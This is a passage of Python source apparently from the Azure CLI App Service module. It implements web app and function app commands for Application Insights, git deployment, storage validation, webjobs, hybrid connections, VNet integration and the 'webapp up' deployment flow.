    appinsights = app_insights_client.components.create_or_update(ai_resource_group_name, ai_name, ai_properties)
    if appinsights is None or appinsights.instrumentation_key is None:
        logger.warning(creation_failed_warn)
        return
    # We make this success message as a warning to not interfere with regular JSON output in stdout
    logger.warning('Application Insights \"%s\" was created for this Function App. '
                   'You can visit https://portal.azure.com/#resource%s/overview to view your '
                   'Application Insights component', appinsights.name, appinsights.id)
    update_app_settings(cmd, functionapp.resource_group, functionapp.name,
                        ['APPINSIGHTS_INSTRUMENTATIONKEY={}'.format(appinsights.instrumentation_key)])
def _set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url=None,
                             deployment_source_branch='master', deployment_local_git=None):
    """Configure git deployment: link a remote repository and/or enable local git.

    Remote-link failures are logged as warnings rather than raised. When
    local git is enabled, the git URL is attached to the webapp object as
    'deploymentLocalGitUrl'.
    """
    if deployment_source_url:
        logger.warning("Linking to git repository '%s'", deployment_source_url)
        try:
            config_source_control(cmd, resource_group_name, name, deployment_source_url, 'git',
                                  deployment_source_branch, manual_integration=True)
        except Exception as ex:  # pylint: disable=broad-except
            ex = ex_handler_factory(no_throw=True)(ex)
            logger.warning("Link to git repository failed due to error '%s'", ex)
    if deployment_local_git:
        git_info = enable_local_git(cmd, resource_group_name, name)
        logger.warning("Local git is configured with url of '%s'", git_info['url'])
        setattr(webapp, 'deploymentLocalGitUrl', git_info['url'])
def _validate_and_get_connection_string(cli_ctx, resource_group_name, storage_account):
    """Validate a storage account for Functions use and return its connection string.

    The account (name or resource id) must expose blob, queue and table
    endpoints and be of an allowed SKU; otherwise CLIError is raised listing
    every problem found. Previously the endpoint check overwrote the message
    on each loop iteration (only the last missing endpoint was reported) and
    the SKU message was concatenated without a separator; errors are now
    collected in a list and joined.
    """
    sa_resource_group = resource_group_name
    if is_valid_resource_id(storage_account):
        sa_resource_group = parse_resource_id(storage_account)['resource_group']
        storage_account = parse_resource_id(storage_account)['name']
    storage_client = get_mgmt_service_client(cli_ctx, StorageManagementClient)
    storage_properties = storage_client.storage_accounts.get_properties(sa_resource_group,
                                                                        storage_account)
    errors = []
    endpoints = storage_properties.primary_endpoints
    sku = storage_properties.sku.name
    allowed_storage_types = ['Standard_GRS', 'Standard_RAGRS', 'Standard_LRS', 'Standard_ZRS', 'Premium_LRS', 'Standard_GZRS']  # pylint: disable=line-too-long
    # the Functions runtime needs all three service endpoints
    for e in ['blob', 'queue', 'table']:
        if not getattr(endpoints, e, None):
            errors.append("Storage account '{}' has no '{}' endpoint. It must have table, queue, and blob endpoints all enabled".format(storage_account, e))  # pylint: disable=line-too-long
    if sku not in allowed_storage_types:
        errors.append('Storage type {} is not allowed'.format(sku))
    if errors:
        raise CLIError('. '.join(errors))
    obj = storage_client.storage_accounts.list_keys(sa_resource_group, storage_account)  # pylint: disable=no-member
    try:
        keys = [obj.keys[0].value, obj.keys[1].value]  # pylint: disable=no-member
    except AttributeError:
        # Older API versions have a slightly different structure
        keys = [obj.key1, obj.key2]  # pylint: disable=no-member
    endpoint_suffix = cli_ctx.cloud.suffixes.storage_endpoint
    connection_string = 'DefaultEndpointsProtocol={};EndpointSuffix={};AccountName={};AccountKey={}'.format(
        "https",
        endpoint_suffix,
        storage_account,
        keys[0])  # pylint: disable=no-member
    return connection_string
def list_consumption_locations(cmd):
    """Return consumption-plan-capable regions as a list of {'name': <lowercase-no-spaces>} dicts."""
    regions = web_client_factory(cmd.cli_ctx).list_geo_regions(sku='Dynamic')
    names = []
    for region in regions:
        names.append({'name': region.name.lower().replace(' ', '')})
    return names
def list_locations(cmd, sku, linux_workers_enabled=None):
    """Return geo regions supporting the given SKU, restricted to where Microsoft.Web 'sites' is available."""
    web_client = web_client_factory(cmd.cli_ctx)
    geo_regions = web_client.list_geo_regions(sku=get_sku_tier(sku),
                                              linux_workers_enabled=linux_workers_enabled)
    providers_client = providers_client_factory(cmd.cli_ctx)
    resource_types = getattr(providers_client.get('Microsoft.Web'), 'resource_types', [])
    # find the locations of the 'sites' resource type; fall back to the raw
    # resource-type list when 'sites' is absent (preserves legacy behavior)
    site_locations = next((rt.locations for rt in resource_types if rt.resource_type == 'sites'),
                          resource_types)
    return [region for region in geo_regions if region.name in site_locations]
def _check_zip_deployment_status(cmd, rg_name, name, deployment_status_url, authorization, timeout=None):
    """Poll the Kudu deployment-status endpoint until the zip deployment finishes.

    Polls every 2 seconds up to timeout/2 attempts (default 450, i.e. ~15
    minutes). Status 3 means failure (raises CLIError after enabling default
    logging); status 4 means success. Raises CLIError on timeout while the
    deployment is still in progress. Returns the last status payload dict.
    """
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    total_trials = (int(timeout) // 2) if timeout else 450
    num_trials = 0
    while num_trials < total_trials:
        time.sleep(2)
        response = requests.get(deployment_status_url, headers=authorization,
                                verify=not should_disable_connection_verify())
        try:
            res_dict = response.json()
        except json.decoder.JSONDecodeError:
            # transient bad payload from the status endpoint: keep polling
            logger.warning("Deployment status endpoint %s returns malformed data. Retrying...", deployment_status_url)
            res_dict = {}
        finally:
            num_trials = num_trials + 1
        if res_dict.get('status', 0) == 3:
            _configure_default_logging(cmd, rg_name, name)
            raise CLIError("Zip deployment failed. {}. Please run the command az webapp log deployment show "
                           "-n {} -g {}".format(res_dict, name, rg_name))
        if res_dict.get('status', 0) == 4:
            break
        if 'progress' in res_dict:
            logger.info(res_dict['progress'])  # show only in debug mode, customers seem to find this confusing
    # if the deployment is taking longer than expected
    if res_dict.get('status', 0) != 4:
        _configure_default_logging(cmd, rg_name, name)
        raise CLIError("""Timeout reached by the command, however, the deployment operation
                       is still on-going. Navigate to your scm site to check the deployment status""")
    return res_dict
def list_continuous_webjobs(cmd, resource_group_name, name, slot=None):
    """List continuous webjobs for a web app (or one of its slots)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'list_continuous_web_jobs', slot)
def start_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Start a continuous webjob and return its refreshed state."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        client.web_apps.start_continuous_web_job(resource_group_name, name, webjob_name)
        return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
    client.web_apps.start_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
def stop_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Stop a continuous webjob and return its refreshed state."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        client.web_apps.stop_continuous_web_job(resource_group_name, name, webjob_name)
        return client.web_apps.get_continuous_web_job(resource_group_name, name, webjob_name)
    client.web_apps.stop_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.get_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
def remove_continuous_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a continuous webjob from a web app (or one of its slots)."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.delete_continuous_web_job(resource_group_name, name, webjob_name)
    return client.web_apps.delete_continuous_web_job_slot(resource_group_name, name, webjob_name, slot)
def list_triggered_webjobs(cmd, resource_group_name, name, slot=None):
    """List triggered webjobs for a web app (or one of its slots)."""
    return _generic_site_operation(
        cmd.cli_ctx, resource_group_name, name, 'list_triggered_web_jobs', slot)
def run_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Run a triggered webjob and return its refreshed state."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        client.web_apps.run_triggered_web_job(resource_group_name, name, webjob_name)
        return client.web_apps.get_triggered_web_job(resource_group_name, name, webjob_name)
    client.web_apps.run_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
    return client.web_apps.get_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
def remove_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """Delete a triggered webjob from a web app (or one of its slots)."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.delete_triggered_web_job(resource_group_name, name, webjob_name)
    return client.web_apps.delete_triggered_web_job_slot(resource_group_name, name, webjob_name, slot)
def list_hc(cmd, name, resource_group_name, slot=None):
    """List a web app's hybrid connections, pruned to the essential fields."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        raw = client.web_apps.list_hybrid_connections(resource_group_name, name)
    else:
        raw = client.web_apps.list_hybrid_connections_slot(resource_group_name, name, slot)
    pruned = []
    # reformats hybrid connection, to prune unnecessary fields
    for conn in raw.additional_properties["value"]:
        props = conn["properties"]
        pruned.append({
            "id": conn["id"],
            "location": conn["location"],
            "name": conn["name"],
            "properties": {
                "hostname": props["hostname"],
                "port": props["port"],
                "relayArmUri": props["relayArmUri"],
                "relayName": props["relayName"],
                "serviceBusNamespace": props["serviceBusNamespace"],
                "serviceBusSuffix": props["serviceBusSuffix"]
            },
            # resource group is the 5th segment of the ARM resource id
            "resourceGroup": conn["id"].split("/")[4],
            "type": conn["type"]
        })
    return pruned
def add_hc(cmd, name, resource_group_name, namespace, hybrid_connection, slot=None):
    """Attach an existing Service Bus Relay hybrid connection to a web app (or slot).

    Looks up the relay namespace across the subscription, ensures a
    'defaultSender' authorization rule with send rights exists, reads the
    endpoint hostname:port from the connection's user metadata, then creates
    the hybrid connection on the app. Returns a pruned dict of the result.
    Raises ResourceNotFoundError when the namespace cannot be found.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    namespace_client = namespaces_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # scan all relay namespaces for the requested one to obtain its ARM id
    hy_co_id = ''
    for n in namespace_client.list():
        logger.warning(n.name)
        if n.name == namespace:
            hy_co_id = n.id
    if hy_co_id == '':
        raise ResourceNotFoundError('Azure Service Bus Relay namespace {} was not found.'.format(namespace))
    # extract the resource group segment from the namespace's ARM id
    i = 0
    hy_co_resource_group = ''
    hy_co_split = hy_co_id.split("/")
    for z in hy_co_split:
        if z == "resourceGroups":
            hy_co_resource_group = hy_co_split[i + 1]
        i = i + 1
    # calling the relay API to get information about the hybrid connection
    hy_co = hy_co_client.get(hy_co_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(hy_co_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(hy_co_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(hy_co_resource_group, namespace, hybrid_connection, "defaultSender")
    hy_co_info = hy_co.id
    # user_metadata holds a literal list of {"key": ..., "value": ...} entries;
    # the 'endpoint' entry carries "hostname:port"
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = ''
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    id_parameters = hy_co_info.split("/")
    # populate object with information from the hybrid connection, and set it
    # on webapp
    hc = HybridConnection(service_bus_namespace=id_parameters[8],
                          relay_name=hybrid_connection,
                          relay_arm_uri=hy_co_info,
                          hostname=hostname,
                          port=port,
                          send_key_name="defaultSender",
                          send_key_value=hy_co_keys.primary_key,
                          service_bus_suffix=".servicebus.windows.net")
    if slot is None:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection(resource_group_name, name, namespace,
                                                                           hybrid_connection, hc)
    else:
        return_hc = web_client.web_apps.create_or_update_hybrid_connection_slot(resource_group_name, name, namespace,
                                                                                hybrid_connection, slot, hc)
    # reformats hybrid connection, to prune unnecessary fields
    resourceGroup = return_hc.id.split("/")
    mod_hc = {
        "hostname": return_hc.hostname,
        "id": return_hc.id,
        "location": return_hc.additional_properties["location"],
        "name": return_hc.name,
        "port": return_hc.port,
        "relayArmUri": return_hc.relay_arm_uri,
        "resourceGroup": resourceGroup[4],
        "serviceBusNamespace": return_hc.service_bus_namespace,
        "serviceBusSuffix": return_hc.service_bus_suffix
    }
    return mod_hc
# set the key the apps use to connect with the hybrid connection
def set_hc_key(cmd, plan, resource_group_name, namespace, hybrid_connection, key_type):
    """Switch every app on the plan that uses the hybrid connection to the primary or secondary send key.

    key_type must be 'primary' or 'secondary' (case-insensitive); anything
    else logs a warning and returns None. Returns the refreshed list of web
    apps using the hybrid connection.
    """
    HybridConnection = cmd.get_models('HybridConnection')
    web_client = web_client_factory(cmd.cli_ctx)
    # extract the hybrid connection resource group
    asp_hy_co = web_client.app_service_plans.get_hybrid_connection(resource_group_name, plan,
                                                                   namespace, hybrid_connection)
    arm_uri = asp_hy_co.relay_arm_uri
    split_uri = arm_uri.split("resourceGroups/")
    resource_group_strings = split_uri[1].split('/')
    relay_resource_group = resource_group_strings[0]
    hy_co_client = hycos_mgmt_client_factory(cmd.cli_ctx, cmd.cli_ctx)
    # calling the relay function to obtain information about the hc in question
    hy_co = hy_co_client.get(relay_resource_group, namespace, hybrid_connection)
    # if the hybrid connection does not have a default sender authorization
    # rule, create it
    hy_co_rules = hy_co_client.list_authorization_rules(relay_resource_group, namespace, hybrid_connection)
    has_default_sender_key = False
    for r in hy_co_rules:
        if r.name.lower() == "defaultsender":
            for z in r.rights:
                if z == z.send:
                    has_default_sender_key = True
    if not has_default_sender_key:
        rights = [AccessRights.send]
        hy_co_client.create_or_update_authorization_rule(relay_resource_group, namespace, hybrid_connection,
                                                         "defaultSender", rights)
    hy_co_keys = hy_co_client.list_keys(relay_resource_group, namespace, hybrid_connection, "defaultSender")
    # the 'endpoint' metadata entry carries "hostname:port"
    hy_co_metadata = ast.literal_eval(hy_co.user_metadata)
    hy_co_hostname = 0
    for x in hy_co_metadata:
        if x["key"] == "endpoint":
            hy_co_hostname = x["value"]
    hostname_parts = hy_co_hostname.split(":")
    hostname = hostname_parts[0]
    port = hostname_parts[1]
    key = "empty"
    if key_type.lower() == "primary":
        key = hy_co_keys.primary_key
    elif key_type.lower() == "secondary":
        key = hy_co_keys.secondary_key
    # ensures input is correct
    if key == "empty":
        logger.warning("Key type is invalid - must be primary or secondary")
        return
    apps = web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan, namespace,
                                                                           hybrid_connection)
    # changes the key for every app that uses that hybrid connection
    for x in apps:
        app_info = ast.literal_eval(x)
        app_name = app_info["name"]
        app_id = app_info["id"]
        id_split = app_id.split("/")
        app_resource_group = id_split[4]
        hc = HybridConnection(service_bus_namespace=namespace, relay_name=hybrid_connection,
                              relay_arm_uri=arm_uri, hostname=hostname, port=port, send_key_name="defaultSender",
                              send_key_value=key)
        web_client.web_apps.update_hybrid_connection(app_resource_group, app_name, namespace,
                                                     hybrid_connection, hc)
    return web_client.app_service_plans.list_web_apps_by_hybrid_connection(resource_group_name, plan,
                                                                           namespace, hybrid_connection)
def appservice_list_vnet(cmd, resource_group_name, plan):
    """List virtual network connections of an App Service plan."""
    client = web_client_factory(cmd.cli_ctx)
    return client.app_service_plans.list_vnets(resource_group_name, plan)
def remove_hc(cmd, resource_group_name, name, namespace, hybrid_connection, slot=None):
    """Remove a hybrid connection from a web app; warns and no-ops for Linux apps."""
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if webapp.reserved:  # reserved == Linux
        return logger.warning("hybrid connections not supported on a linux app.")
    client = web_client_factory(cmd.cli_ctx)
    if slot is not None:
        return client.web_apps.delete_hybrid_connection_slot(resource_group_name, name, namespace,
                                                             hybrid_connection, slot)
    return client.web_apps.delete_hybrid_connection(resource_group_name, name, namespace, hybrid_connection)
def list_vnet_integration(cmd, name, resource_group_name, slot=None):
    """List a web app's VNet integrations, pruned and with GUID prefixes stripped from names/ids."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is None:
        connections = list(client.web_apps.list_vnet_connections(resource_group_name, name))
    else:
        connections = list(client.web_apps.list_vnet_connections_slot(resource_group_name, name, slot))
    pruned = []
    # reformats the vnet entry, removing unecessary information
    for conn in connections:
        # drop the GUID prefix ("<guid>_<name>") from the display name
        full_name = conn.name
        if '_' in full_name:
            short_name = full_name[full_name.index('_') + 1:]
        else:
            short_name = full_name
        conn_id = conn.id
        # rebuild the id with the shortened trailing segment
        short_id = conn_id[:conn_id.rindex('/')] + '/' + short_name
        pruned.append({"certThumbprint": conn.cert_thumbprint,
                       "id": short_id,
                       "location": conn.additional_properties["location"],
                       "name": short_name,
                       "resourceGroup": conn_id.split('/')[4],
                       "routes": conn.routes,
                       "type": conn.type,
                       "vnetResourceId": conn.vnet_resource_id})
    return pruned
def add_webapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
    """Add regional VNet integration to a web app (or slot)."""
    return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet,
                                 slot=slot, skip_delegation_check=skip_delegation_check)
def add_functionapp_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None,
                                     skip_delegation_check=False):
    """Add regional VNet integration to a function app (or slot)."""
    return _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet,
                                 slot=slot, skip_delegation_check=skip_delegation_check)
def _add_vnet_integration(cmd, name, resource_group_name, vnet, subnet, slot=None, skip_delegation_check=False):
    """Wire a web/function app (or slot) to a subnet for regional VNet integration.

    Optionally verifies/creates the Microsoft.Web/serverFarms delegation on
    the subnet, sets the app's virtual_network_subnet_id, and enables the
    'route all' site config. Returns a summary dict of the vnet/subnet used.
    """
    subnet_info = _get_subnet_info(cmd=cmd,
                                   resource_group_name=resource_group_name,
                                   subnet=subnet,
                                   vnet=vnet)
    client = web_client_factory(cmd.cli_ctx, api_version="2021-01-01")
    app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot, client=client)
    parsed_plan = parse_resource_id(app.server_farm_id)
    plan_info = client.app_service_plans.get(parsed_plan['resource_group'], parsed_plan["name"])
    if skip_delegation_check:
        logger.warning('Skipping delegation check. Ensure that subnet is delegated to Microsoft.Web/serverFarms.'
                       ' Missing delegation can cause "Bad Request" error.')
    else:
        _vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
                               vnet_resource_group=subnet_info["resource_group_name"],
                               vnet_name=subnet_info["vnet_name"],
                               subnet_name=subnet_info["subnet_name"])
    app.virtual_network_subnet_id = subnet_info["subnet_resource_id"]
    _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'begin_create_or_update', slot,
                            client=client, extra_parameter=app)
    # Enable Route All configuration
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.vnet_route_all_enabled is not True:
        config = update_site_configs(cmd, resource_group_name, name, slot=slot, vnet_route_all_enabled='true')
    return {
        "id": subnet_info["vnet_resource_id"],
        "location": plan_info.location,  # must be the same as vnet location bc of validation check
        "name": subnet_info["vnet_name"],
        "resourceGroup": subnet_info["resource_group_name"],
        "subnetResourceId": subnet_info["subnet_resource_id"]
    }
def _vnet_delegation_check(cmd, subnet_subscription_id, vnet_resource_group, vnet_name, subnet_name):
    """Ensure the subnet is delegated to Microsoft.Web/serverFarms, adding the delegation when missing.

    Subnets in another subscription cannot be inspected from here, so in that
    case only warnings with manual instructions are emitted.
    """
    from azure.cli.core.commands.client_factory import get_subscription_id
    Delegation = cmd.get_models('Delegation', resource_type=ResourceType.MGMT_NETWORK)
    vnet_client = network_client_factory(cmd.cli_ctx)
    if get_subscription_id(cmd.cli_ctx).lower() != subnet_subscription_id.lower():
        logger.warning('Cannot validate subnet in other subscription for delegation to Microsoft.Web/serverFarms.'
                       ' Missing delegation can cause "Bad Request" error.')
        logger.warning('To manually add a delegation, use the command: az network vnet subnet update '
                       '--resource-group %s '
                       '--name %s '
                       '--vnet-name %s '
                       '--delegations Microsoft.Web/serverFarms', vnet_resource_group, subnet_name, vnet_name)
        return
    subnet_obj = vnet_client.subnets.get(vnet_resource_group, vnet_name, subnet_name)
    already_delegated = any(
        d.service_name.lower() == 'microsoft.web/serverfarms'
        for d in subnet_obj.delegations)
    if not already_delegated:
        subnet_obj.delegations = [Delegation(name="delegation", service_name="Microsoft.Web/serverFarms")]
        vnet_client.subnets.begin_create_or_update(vnet_resource_group, vnet_name, subnet_name,
                                                   subnet_parameters=subnet_obj)
def _validate_subnet(cli_ctx, subnet, vnet, resource_group_name):
    """Resolve a subnet/vnet pair to a subnet resource id.

    Accepts the subnet as a full resource id (vnet input then ignored with a
    warning when inconsistent), or the vnet as a resource id or name plus a
    subnet name. When the vnet is given by name it is searched across the
    subscription, preferring a match in resource_group_name. Returns the
    subnet resource id, or None (with a warning) when no vnet is found.
    """
    subnet_is_id = is_valid_resource_id(subnet)
    if subnet_is_id:
        subnet_id_parts = parse_resource_id(subnet)
        vnet_name = subnet_id_parts['name']
        if not (vnet_name.lower() == vnet.lower() or subnet.startswith(vnet)):
            logger.warning('Subnet ID is valid. Ignoring vNet input.')
        return subnet
    vnet_is_id = is_valid_resource_id(vnet)
    if vnet_is_id:
        vnet_id_parts = parse_resource_id(vnet)
        return resource_id(
            subscription=vnet_id_parts['subscription'],
            resource_group=vnet_id_parts['resource_group'],
            namespace='Microsoft.Network',
            type='virtualNetworks',
            name=vnet_id_parts['name'],
            child_type_1='subnets',
            child_name_1=subnet)
    # Reuse logic from existing command to stay backwards compatible
    vnet_client = network_client_factory(cli_ctx)
    list_all_vnets = vnet_client.virtual_networks.list_all()
    vnets = []
    for v in list_all_vnets:
        if vnet in (v.name, v.id):
            vnet_details = parse_resource_id(v.id)
            vnet_resource_group = vnet_details['resource_group']
            vnets.append((v.id, v.name, vnet_resource_group))
    if not vnets:
        return logger.warning("The virtual network %s was not found in the subscription.", vnet)
    # If more than one vnet, try to use one from same resource group. Otherwise, use first and log the vnet resource id
    found_vnet = [v for v in vnets if v[2].lower() == resource_group_name.lower()]
    if not found_vnet:
        found_vnet = [vnets[0]]
    (vnet_id, vnet, vnet_resource_group) = found_vnet[0]
    if len(vnets) > 1:
        logger.warning("Multiple virtual networks of name %s were found. Using virtual network with resource ID: %s. "
                       "To use a different virtual network, specify the virtual network resource ID using --vnet.",
                       vnet, vnet_id)
    vnet_id_parts = parse_resource_id(vnet_id)
    return resource_id(
        subscription=vnet_id_parts['subscription'],
        resource_group=vnet_id_parts['resource_group'],
        namespace='Microsoft.Network',
        type='virtualNetworks',
        name=vnet_id_parts['name'],
        child_type_1='subnets',
        child_name_1=subnet)
def remove_vnet_integration(cmd, name, resource_group_name, slot=None):
    """Remove the (swift) VNet integration from a web app or one of its slots."""
    client = web_client_factory(cmd.cli_ctx)
    if slot is not None:
        return client.web_apps.delete_swift_virtual_network_slot(resource_group_name, name, slot)
    return client.web_apps.delete_swift_virtual_network(resource_group_name, name)
def get_history_triggered_webjob(cmd, resource_group_name, name, webjob_name, slot=None):
    """List the run history of a triggered webjob, optionally scoped to a deployment slot."""
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.list_triggered_web_job_history(resource_group_name, name, webjob_name)
    return client.web_apps.list_triggered_web_job_history_slot(resource_group_name, name, webjob_name, slot)
def webapp_up(cmd, name=None, resource_group_name=None, plan=None, location=None, sku=None,  # pylint: disable=too-many-statements,too-many-branches
              os_type=None, runtime=None, dryrun=False, logs=False, launch_browser=False, html=False,
              app_service_environment=None):
    """Create (if needed) and zip-deploy the current working directory's contents to a webapp.

    Detects the OS and runtime from the sources (unless --os-type/--runtime are given),
    reuses or creates the resource group, App Service plan and app, zip-deploys the
    directory, and finally persists the chosen values as local configured defaults.
    Returns a JSON-serializable dict summarizing the deployment; with --dryrun the
    same dict is returned without creating or deploying anything.
    """
    if not name:
        name = generate_default_app_name(cmd)
    import os
    AppServicePlan = cmd.get_models('AppServicePlan')
    src_dir = os.getcwd()
    # Double the path separators so the path survives being embedded in the JSON summary string below.
    _src_path_escaped = "{}".format(src_dir.replace(os.sep, os.sep + os.sep))
    client = web_client_factory(cmd.cli_ctx)
    user = get_profile_username()
    _create_new_rg = False
    _site_availability = get_site_availability(cmd, name)
    # name_available implies no app with this name exists yet (in any subscription).
    _create_new_app = _site_availability.name_available
    os_name = os_type if os_type else detect_os_form_src(src_dir, html)
    _is_linux = os_name.lower() == LINUX_OS_NAME
    helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
    if runtime and html:
        raise MutuallyExclusiveArgumentError('Conflicting parameters: cannot have both --runtime and --html specified.')
    if runtime:
        # Caller pinned the runtime explicitly; validate it against the known stacks.
        runtime = helper.remove_delimiters(runtime)
        match = helper.resolve(runtime, _is_linux)
        if not match:
            raise ValidationError("{0} runtime '{1}' is not supported. Please check supported runtimes with: "
                                  "'az webapp list-runtimes --os {0}'".format(os_name, runtime))
        language = runtime.split('|')[0]
        version_used_create = '|'.join(runtime.split('|')[1:])
        detected_version = '-'
    else:
        # detect the version
        _lang_details = get_lang_from_content(src_dir, html, is_linux=_is_linux)
        language = _lang_details.get('language')
        _data = get_runtime_version_details(_lang_details.get('file_loc'), language, helper, _is_linux)
        version_used_create = _data.get('to_create')
        detected_version = _data.get('detected')
    runtime_version = "{}|{}".format(language, version_used_create) if \
        version_used_create != "-" else version_used_create
    site_config = None
    if not _create_new_app:  # App exists, or App name unavailable
        if _site_availability.reason == 'Invalid':
            raise ValidationError(_site_availability.message)
        # Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
        logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
        app_details = get_app_details(cmd, name)
        if app_details is None:
            # Name is taken but the app is not visible in this subscription.
            raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
                           "is a part of the current subscription if updating an existing app. If creating "
                           "a new app, app names must be globally unique. Please try a more unique name or "
                           "leave unspecified to receive a randomly generated name.".format(name))
        current_rg = app_details.resource_group
        if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
            raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
                           "match the value entered '{}'. Please re-run command with the "
                           "correct parameters.". format(name, current_rg, resource_group_name))
        rg_name = resource_group_name or current_rg
        if location is None:
            loc = app_details.location.replace(" ", "").lower()
        else:
            loc = location.replace(" ", "").lower()
        plan_details = parse_resource_id(app_details.server_farm_id)
        current_plan = plan_details['name']
        if plan is not None and current_plan.lower() != plan.lower():
            raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
                           "Please check if you have configured defaults for plan name and re-run command."
                           .format(plan, current_plan))
        plan = plan or plan_details['name']
        plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
        sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
        current_os = 'Linux' if plan_info.reserved else 'Windows'
        # Raise error if current OS of the app is different from the current one
        if current_os.lower() != os_name.lower():
            raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
                           "'{}'. Please create a new app "
                           "to continue this operation. For more information on default behaviors, "
                           "see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
                           .format(name, current_os, src_dir, os_name))
        _is_linux = plan_info.reserved
        # for an existing app check if the runtime version needs to be updated
        # Get site config to check the runtime version
        site_config = client.web_apps.get_configuration(rg_name, name)
    else:  # need to create new app, check if we need to use default RG or use user entered values
        logger.warning("The webapp '%s' doesn't exist", name)
        sku = get_sku_to_use(src_dir, html, sku, runtime)
        loc = set_location(cmd, sku, location)
        rg_name = get_rg_to_use(user, resource_group_name)
        _create_new_rg = not check_resource_group_exists(cmd, rg_name)
        plan = get_plan_to_use(cmd=cmd,
                               user=user,
                               loc=loc,
                               sku=sku,
                               create_rg=_create_new_rg,
                               resource_group_name=rg_name,
                               plan=plan,
                               is_linux=_is_linux,
                               client=client)
    # Summary shown for --dryrun and used as the base of the returned payload.
    dry_run_str = r""" {
            "name" : "%s",
            "appserviceplan" : "%s",
            "resourcegroup" : "%s",
            "sku": "%s",
            "os": "%s",
            "location" : "%s",
            "src_path" : "%s",
            "runtime_version_detected": "%s",
            "runtime_version": "%s"
            }
            """ % (name, plan, rg_name, get_sku_tier(sku), os_name, loc, _src_path_escaped, detected_version,
                   runtime_version)
    create_json = json.loads(dry_run_str)
    if dryrun:
        logger.warning("Web app will be created with the below configuration,re-run command "
                       "without the --dryrun flag to create & deploy a new app")
        return create_json
    if _create_new_rg:
        logger.warning("Creating Resource group '%s' ...", rg_name)
        create_resource_group(cmd, rg_name, loc)
        logger.warning("Resource group creation complete")
    # create ASP
    logger.warning("Creating AppServicePlan '%s' ...", plan)
    # we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
    # updated we update those
    try:
        create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
                                number_of_workers=1 if _is_linux else None, location=loc,
                                app_service_environment=app_service_environment)
    except Exception as ex:  # pylint: disable=broad-except
        # NOTE(review): assumes the exception carries an HTTP `.response` (msrest-style error);
        # any other exception type raised here would surface as AttributeError — confirm.
        if ex.response.status_code == 409:  # catch 409 conflict when trying to create existing ASP in diff location
            try:
                response_content = json.loads(ex.response._content.decode('utf-8'))  # pylint: disable=protected-access
            except Exception:  # pylint: disable=broad-except
                raise CLIInternalError(ex)
            raise UnclassifiedUserFault(response_content['error']['message'])
        raise AzureResponseError(ex)
    if _create_new_app:
        logger.warning("Creating webapp '%s' ...", name)
        create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
                      using_webapp_up=True, language=language)
